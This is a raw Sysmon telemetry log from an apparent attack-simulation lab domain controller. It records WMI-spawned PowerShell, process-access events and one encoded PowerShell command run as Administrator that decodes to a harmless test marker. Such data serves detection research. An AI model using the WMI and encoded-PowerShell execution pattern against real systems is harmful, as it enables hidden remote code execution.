16:53:44.875{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002239100Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.885{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /EncodedCo VwByAGkAdABlAC0ASABvAHMAdAAgADgAYwA4ADMAOQAzADAAZAAtAGQAOQBmADUALQA0ADUAMAA5AC0AYQA3ADgAZQAtADgAMQBhAGMANgBlAGQAZAA0ADMAOQA3AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002239099Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.857{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239098Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.857{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A2AA-00000000AD01}6424C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239097Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.857{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239096Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.857{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A0AA-00000000AD01}5488C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239095Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.857{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239094Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.857{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9EAA-00000000AD01}1096C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239093Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.857{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239092Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.857{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239091Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239090Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239089Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239088Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239087Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239086Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239085Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239084Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239083Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239082Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239081Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\S